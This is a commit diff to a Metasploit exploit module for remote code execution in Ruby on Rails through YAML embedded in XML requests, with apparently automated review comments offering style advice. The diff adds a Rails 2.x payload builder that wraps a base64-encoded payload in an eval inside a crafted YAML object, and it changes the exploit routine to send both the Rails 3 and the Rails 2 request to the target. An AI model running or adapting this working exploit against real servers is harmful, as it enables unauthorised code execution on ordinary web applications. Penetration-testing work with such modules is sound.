Merge in Rails2 support now that its in master
parent
bf013ba65f
commit
42ea64c21b
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
an attacker to instantiate a remote object, which in turn can be used to execute
any ruby code remotely in the context of the application.
This module has been tested across multiple versions of RoR 3.x, but does not yet
work against 2.x versions of RoR.
This module has been tested across multiple versions of RoR 3.x and RoR 2.x
},
'Author' =>
[
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml
def build_yaml_rails2
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml
end
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml_rails3
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
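Review bot: The header comment above the new `build_yaml_rails2` is identical to the one above `build_yaml_rails3` (`# Create the YAML document that will be embedded into the XML`), so neither says which Rails line it serves; suggest `# Create the YAML document embedded into the XML for Rails 2.x targets` on the first and the 3.x counterpart on the second. The bare `yaml` on the last line of `build_yaml_rails2` is redundant, because the preceding assignment is already the method's final expression — either drop the local and return the concatenated string directly, or keep the local and remove the trailing `yaml`. The repeated `rand(8)+1` reads more clearly as `rand(1..8)`, which states the intended range without the off-by-one adjustment. `build_yaml_rails3` starts in this hunk but its body continues outside it, and the enclosing Metasploit3 class begins outside the hunk.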
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Create the XML wrapper with any desired evasion
#
def build_request
def build_request(v)
xml = ''
elo = Rex::Text.rand_text_alpha(rand(12)+4)
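Review bot: The new `v` parameter on `build_request` is an undocumented bare integer, and the only place it is consulted is the ternary `v == 2 ? build_yaml_rails2 : build_yaml_rails3` in the next hunk, so any value other than 2 (a typo, or nil) silently yields the Rails 3 document instead of failing. Either validate it at the top of the method, `raise ArgumentError, "unsupported Rails version: #{v.inspect}" unless [2, 3].include?(v)`, or replace the integer with a named keyword such as `rails_version:` so call sites read as intent. The header comment should also grow a parameter line, e.g. `# @param v [Integer] Rails major version (2 or 3) that selects the YAML document`. `build_request`'s body continues beyond this hunk and the next, and the same point covers the ternary hunk, which gets no separate note.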
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
el = Rex::Text.rand_text_alpha(rand(12)+4)
xml << "<#{el} type='yaml'>"
xml << build_yaml
xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
xml << "</#{el}>"
if datastore['XML::PadElement']
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
# Send the actual request
#
def exploit
data = build_request
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'data' => data,
'data' => build_request(3)
}, 25)
handler
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'data' => build_request(2)
}, 25)
handler
end
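Review bot: `res` is assigned from `send_request_cgi` in both the Rails 3 and the Rails 2 block of `exploit` but is never read afterwards, so both assignments are dead; either drop them or use the response to report the outcome of each request in the status output. The two blocks are otherwise identical except for the version passed to `build_request` and the version named in the `print_status` message, so a private helper taking the version (called as `send_rails_request(3)` and then `send_rails_request(2)`) would remove the duplication and keep the request hash and the repeated `}, 25)` timeout literal in one place. The enclosing Metasploit3 class begins outside the hunk.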